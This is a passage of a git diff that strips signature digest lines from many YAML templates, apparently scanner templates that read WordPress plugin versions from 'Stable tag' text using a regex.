regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204044a5ff857e22d148956762612049200436ea75b28ba588538f21bf089766ba02210094614fcd50e39b43cff0134a9d15ffa773f727d543481f158c0cc60eb9b0fc83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 12ff068618..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210099ef57e349ae942e5d615aa3439a3bc8c86dfd42dd338a91dac3d82b276213140221009f5bd33428e53e45cfb62a23de1669aadf5d79660ebd14f851452f044b96b993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a036c1d606..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f020f54d14d4788e806403dc37711f65b10e73e66616647cf3c3194d9902c8c8022100e266eb6dc98fbf0923bbae89adb816e30d3c27fcc96d19f55deb8683a44eb9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 85d17ebfef..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c7adec5b77714a3c018004db64636a76a21db9fa943449916a2f6f2ed45daa5d02210089a322231d7d470f89cc4575a5db17806fd05fadb8a8a87424b447679afc23f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index d8020d4aa5..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e4d4db4d98e9582ff1adde589e1825e086f7d112a20b0106c4f6adba18c9a473022077a28726120bfe707c198105e609a5c5b1482f7e7c04cdf1f2038e1ada387d1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 48dba869cb..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bd6c70c75f8dc2d5290b80ac0057db8f260b3ec5da6a29681f2d526cbaa4979b02200edb5f57b5d284e91857b4b7d7884c88d83c925e95c0d2d82d6160d67572979d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a66d1e3945..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a439d5e89523765aee4208decdbcd507626aee8afc4fd2df7e652ff184134854022100f55b40e242e7b7037c0449fecbda9e6f9b6d70228936c09d42eeb6b25ea08d32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 68b04a284d..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022041dfde43d1c66addaf90718c188d52906555b7fd999dbab6758af8d1611eb25c0220484e254a10a88ab6719fc638b33f9e14dab6dddccf37f36b8277ae782762e86e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 557e496b27..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087169ebac4b9ca1b8aeff2615ead26305dbdd9ae3f70a7ff96bbdd0328439938022100fa9a20f8a39ca34a92a4666cf5238038bc53b5abad50f3b1e19f2f22a68c7d8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 254ec5cbea..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022060ea183d7713f69fa5ba2a4cc4fe9419ee51a8ae6151a0c4f76591e8c0b68ebf022100a60980a15543346d83d684435fd1835fc10c2ac6dabb38f5f11a657602981643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index df91c9e24c..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202bd691e52c3e4490ff9b2fa7888eab0b5e8b7e0309a513764bf10bd0ac642e61022006781f4a366604ea2775d8e86991d8fd9e1bff65c1654829ef5bccac4851788f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index d15c73c0b3..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206fc9d896e91dbb88b4a40d350910a1a309dc454b1048d282f23b6b768731fc2302204096021f762ea1a4c523cfe5666fc7f3a1bd9957fa67bbc3faa3c673d5761eaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a35ca4b3fe..fe4c223cba 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d5c0387b6e710f5fec0826c63f7b8d93091f1d8ba9260e9ca322a3b623d78e4022100f4e61b4d0c662f0944c654681d2d1306fd84d0065c215f406700a920e4a0b221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index d97e7d5688..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201ce3551d122aa4c328639f0f43b2ae96e77847ea890ff65173eefd493e4fb0b202201fa291113795c0f16437e4f4e131da0a6cf7876763cdf767745581501d01a6c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 2b01095ff6..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220731776c5c27a3192df697030223a2896acbcfcec3466ab3b77d834d4fc92e75b022100a6faa469fcd28e4d3f179319dfc707aae868697442a7485fbbaf8dd12e3d7913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 9743edbeaa..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009efdb58875b332591ddcb96a12d85a01de34dfb321b02804de3144e8b697a670022000c03845a8e5d3cde4ab362c21efade3717a36d7e3257a12faed3632afe865ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 9dd86ea251..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207631d17beb75b5be656bebe3e0ed79e4016e6c1e034251fc30f3d1604c55583302203e0ae207b711cfa5f9d2aea49c6771c3fd14753b89e32fef272e4b5926980bbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 5f4576fe31..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5d2dfa6cf83a3b3bfdc9ee1d3c8d0324fc115f166e2350a41b7e13ead53f9de0220506795df82b9147221efd3b709712a8c6120d3d164db6f1ccc9f7f7a261da54c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 78e2fb4302..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022015b6fc223115d127300980b7602d96a3141cc263c5bb50dac11b74d8acc56a69022100ca1f9e17a39d5eea6567e338791abfa84f05c294646b29d168ef55b6ac51cdee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 5faab2db0d..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071f5c4c8ce92ec8764e3ac33112cd39354daf843ba308aa4d3cacebfd5236e2c022100f87207f817f8b1d1e47166e78a25b9300e68bb6054bb27bee9c5a2da904df844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2313894e98..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b10b3f4185c3b9b0ffb7daf63675149b040cb606d8a80f24ddaab3b64592ddc022100c3f93c81960c6557abed82c33899389ad2f835953e8c885ec5c6dfdda05db905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index f7d77df970..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e8851a9b15cb154917ffbada86bff5ad8a873f925587fdc49a0dc005d107293022100d350a4fe18b395f0a4c22e2f823b639e06982aae2527db13ec49854964aa5582:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 587c9c94ca..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203913d9222300df7f41c5ddda8d9ab04cfb311b28f91e1a50182632108d5405f7022100ba7c9fb01982c4353fc148033dc82fb4dae2eac376b01b184c408c17f06e5da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 3dbde24eb4..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022013647ce5f29184f931eebf9ca7177e3cb1af89cd8c3ed67161f3ee174380d7550220616d4a63c7262fbb5a8bd1d6692d3eac79e423623acfe99f6a747b7a985dff8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 39d32eee1b..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220043179ed225c88e9fcc2ce00fadcc86228f14cce574c82dc24fa4ff3c2ff06690221009f7f5bab38c24626d53b0d1bf9b52bfdb3250d4b95dde1e7e040fdc289b023dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 879393f5ee..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220070816f3240ef69df7d936fe2dadbc4ce3677fb0502304fa93c14579255779b0022100b56b425770d8e7c2686ba214879a1d1d27e72b7659d729704fe1c2e02aebf9e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index f8731c5e9b..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022013c341c62150e1f9e3cb11dd855ff49312273239ffc25bf267f62f61e3c7ee19022100aa17ab12b5db31853083c395dcab34ce8ddd275cf39b0c381dc39ac82d6630e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 80a4ca1780..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001bd395a0ecb023dfeb3924abae0be085e05d5087e8327996a20dda26b041f1c0221008510392731f90c8726cb27574549fcddde0e997ce9f71f64ffc64bcf2b147707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index c4ed88f378..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202dc7ca5a08b2b979f04fdf51557c32bdd43d6c7239c92f32ff55c142c014bcc4022100d831b76d4eb506286a6ebab8c96c1cd6c050d7ba8a4edde1869a4e3862f8c968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 18cea6ae36..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204f22ffe02488941a95d1d11f3250bfabe5e6e519ebdea1749363aa3fa3890239022019d6f59168e2b32c12a6aadb4d628d5c25f0e18d98896c4d624ccfcf85133950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index a198e2f614..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220397e60c1b21ef7797be7230d69404053500b419ec1d4d5ce61eb4e449275db4d022100c5cb76c3c3e06a4cf069e2e7465cd994ac7f1cf184b46259a5e3430ac2238ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index f2956522de..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d7ed9247e09869852c91cd9699b50eb41aa00cdad5d19a050ae0335afb37e4ef02205bebed887b0bf5c919be424eaa8e3d17a884dd6219afac032b5bdf002e818a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 3c010cf704..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220669268d292b3f030a39d19dad5e745386be4ad6555c10882388f130c92bd363002205ede32b5a8a5c61e795240d80e8a31f8435c0b4f0cbbee3cf8724dfc90a87c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 4cd2c6c146..45260ccfba 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200460c92e2ec6c3ada342f7fa52df64fbaf732a64d19c04bbe4d8f9c8215ad1b9022100b49994334aaa084884766492e468789b0e8c7249067ec1d40fa2a100de051cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index a0c38adbb0..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d9d4d0eb9426af71942ccfa63fc994d46963363319d0971b1d7588cb75df216022100b425e3dc4f65456144090c2b15b884b8bd6b88cdf9f1e8b7cdff6493818c475e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index bf7f6ec236..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ad10bfe660f91b172c719c40ffb682f01a46b15987159936550d36948c9721c022100ebb151cf132a6ed6e0dc6dc97dfa10bc6e64e98c1a6ba72e839ead192d6bda55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 05f5ec39b2..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210086feb0204ac04afadba8228f0b4a7c3dcc2292186c04ad6f6b928723a3b0e3c102202ac17eddf32a40c3d63c28bd091bd0e154912ca4b04526f6eaf14d9f0776c2ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index c627fd5379..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100abbc2510f0a1126b7923b87f52b320bbf8d421b651d9617d730f3c9c7f29d23d0221008a0da7e310f96e046cc33528a9e6df8201695c89fc7abe659fc1d33e98ea14ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 4d95528496..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022051857ef48e3ec8d7c74fc4c749c09ce190fc628d26a8d6d15c9b59745522b805022029dd6b2cbb96aa9b041f2a3e293cd78fb2d1a997a2f0b394b180f96969c3146e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 775b5b3246..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210095938ec5c041f2d7c0eb81954b86f6d727f7c279f375c424950327796dfb8fe2022100e0d09ca930b576922adf225cc9c226296fda96ec58f3876846ae030344ed3721:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 35976b9382..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bf8fa4e0955ff6eb6f2fe3c0a0d4ebd1d0c4a82a35d742d61114f722aa4f7a1d02203852e005949329b5b7dd5891c37692a174c07034511b58683a167e25c9f35c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 6f2b7b1a32..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d57faa6188a0f7d57e619bf96bd01605d5fb2dcdeab1e3f49e546dce6f6c2ca022100a01e21478aa16f73c384db4b090d24846d8f96520a519bf6d3166f68469566aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 8d53492cf4..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022073f5c0e331727c6a1905a2b28027ca9020d5b8b37699d5df9021db670ed7ac7c022100b15e4a7b07c133d59f863c923d88dba370ad2fb5e56351815584bf49370f150f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8c0a21a152..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c30041bd049f37d0c364e6935fed4a3f5ce920c7d86bf133c350d91d87523146022100a5773e1cab41eca6d023258ee57abb1e2a9168c1e3a56bd5c3f41dc48e1c55a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index b9769381ec..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100adc8a2cf592869ed487a1fb947710f20443fdf487593de6e5133454c850e3b02022100a4880f20dc902641f6979ae45ac8f05679f99074bbd3a449b40cad61bb296fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index cb73250c01..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009637cbeaa090118a50e293d39ef8f97ebbcd9681d0f3938ecd40b8a1ae5cd1f3022100ab83ce413250eefbdf6cfaf757049acbd0d9b8164863a9aed21219ed08d8ecb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 291bdbdc2a..fea9594fa0 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022020648ac9951ed8eba8f5655a52c99264ea96fbb8c1d6318cf6ade17b6a3b8c7c022047bfe2c4399a1fbe778e749453ab700d4c1216dfedbac1a272d72692ba750b02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 8486b0c1fc..16dfc8df5f 100644 --- 